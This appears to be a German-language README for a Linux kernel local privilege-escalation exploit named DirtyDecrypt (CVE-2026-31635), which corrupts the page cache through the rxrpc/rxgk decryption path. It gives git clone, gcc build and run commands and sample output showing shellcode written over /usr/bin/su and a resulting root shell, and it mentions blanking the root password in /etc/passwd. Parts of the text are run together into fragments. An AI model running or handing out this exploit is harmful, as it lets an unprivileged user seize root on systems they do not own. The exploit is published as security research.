
CVE-2026-31635
Lokale Privilegieneskalation im Linux-Kernel durch RXGK Page-Cache-Korruption
DirtyDecrypt (CVE-2026-31635) ist eine lokale Privilegieneskalations-Schwachstelle im rxrpc-Subsystem des Linux-Kernels (genauer gesagt der rxgk-Komponente).
Sie nutzt eine fehlende Copy-on-Write (COW)-Prüfung während der AES-CBC-Entschlüsselung aus, wodurch ein unprivilegierter Benutzer den Page-Cache korrumpieren und beliebige Dateien schreiben kann, was zu root-Zugriff führt.
/etc/passwd (leeres Root-Passwort)CONFIG_RXGK=y)CONFIG_RXGK=nCONFIG_RXGKAF_RXRPC-Socket-Unterstützungkeyctl-Dienstprogramm (für rxrpc-Schlüssel)git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt
sudo ./DirtyDecrypt
Erwartete erfolgreiche Ausgabe:
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000
[*] writing shellcode to /usr/bin/su (96 bytes from offset 0)
[========================================] 100% (XXX/96, YYYY fires)
[*] XXX fires in Z.Zs
[*] exec /usr/bin/su
[*] restore: cp /tmp/.su_12345 /usr/bin/su
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
DirtyDecrypt/
├── CVE-2026-31635.c # Hauptexploit
├── README.md # Diese Datei
├── Makefile # Optional
└── exploit.log # Optionales Ausgabeprotokoll
AF_RXRPC-Sockets + splice(), um Page-Cache-Seiten in den RXGK-Entschlüsselungspfad zu zwingenskb_cow_data() aus/etc/passwd) Byte für Byte mit der GleitfenstertechnikDieser Exploit dient ausschließlich zu Bildungs- und autorisierten Sicherheitstests.
Die unbefugte Nutzung auf Systemen, die Ihnen nicht gehören, ist illegal.
⭐ Gib diesem Repository einen Stern, wenn es dir geholfen hat!
Mit ❤️ für die Forschungsgemeinschaft gemacht